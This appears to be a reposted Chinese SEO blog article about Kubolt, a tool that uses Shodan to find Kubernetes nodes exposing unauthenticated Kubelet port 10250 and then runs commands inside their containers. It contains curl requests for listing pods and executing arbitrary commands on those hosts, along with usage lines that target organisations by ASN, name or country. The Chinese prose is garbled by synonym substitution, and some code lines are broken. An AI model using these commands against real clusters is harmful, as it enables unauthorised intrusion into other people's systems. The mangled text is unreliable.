• SEO文章推广! 合作联系qq:122325244 正式全面改版 !免费SEO地址:https://www.seozhan.cn/tool 站长QQ群
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏SEO站长博客吧

Kubolt :可用于扫描盛开Kubernetes集群的适用器械

脚本编程 SEO站长博客 2个月前 (08-01) 22次浏览 已收录 0个评论

摘要

此日给行家先容的是一款名叫 Kubolt 的适用器材,广漠研商职员能够利用 Kubolt 轻松对大家 Kubernetes集群实行安闲扫描职责。

Kubolt 是一款能够用来对大家未认证的 Kubernetes集群实行安闲扫描的适用器材,它许可咱们直接正在容器内运转担任夂箢。

某些情形下,Kubelet 端口 10250 是盛开的并领受未认证的访候恳求,云云咱们就能够利用 kubelet 的getrun函数来正在容器内部实行操作夂箢了:

//getRun handles requests to run a command inside a container.

func(s *Server) getRun(request *restful.Request, response *restful.Response) {

params := getExecRequestParams(request)

pod, ok := s.host.GetPodByName(params.podNamespace,params.podName)

if !ok {

response.WriteError(http.StatusNotFound,fmt.Errorf(pod does not exist))

return

}

   运转机制及利用形式

根蒂恳求示例:

   ssl:trueport:10250 404

Kubelet 默认利用 SSL 以及端口 10250,个中的 404 指的是利用没有 URL 旅途的 HTTP 呼应。

Kubolt 会通过 Shodan API 来恳求获取一份 IP 地方列外,并生存下来以供后续公然资源谍报侦察勾当的利用。

起初,咱们能够运转 Kubelet 并过滤掉恳求中不蕴涵 Unauthorized 但蕴涵 container 的主机,然后直接正在容器内运转夂箢:

   curl -k https://IP-from-Shodan:10250/runningpods/

当然了,你还能够使用下列恳求获取扫数可用的 Pods:

   curl-k https://IP-from-Shodan:10250/pods/

   curlhttp://IP-from-Shodan:10255/pods/

接下来,Kubolt 会对主机返回的呼应消息实行解析,并天生如下所示的新恳求:

   curl -XPOST -k<namespace>/<PodName>/<containerName>-d cmd=<command-to-run>

你还能够利用如下 Shodan 过滤器来针对企业结构搜集实行愈加精准的安闲扫描

-asn

-org

-country

-net

   器材装配

mkdir output

pip install -r requirements.txt

   器材运转 python kubolt.py –query asn:123123 org:ACME Corporation

   pythonkubolt.py –query org:ACME Corporation country:UK

Shodan

Kubolt 利用了 Shodan API 以及相应的 Query Credits,假使你正在没有装备恳求过滤器的情形下运转了该器材,那你有不妨会触发你扫数的 Credits。

   项目地方

Kubolt:【GitHub 传送门】


SEO站长博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:Kubolt :可用于扫描盛开Kubernetes集群的适用器械
喜欢 (0)
[h4ck3st@126.com]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址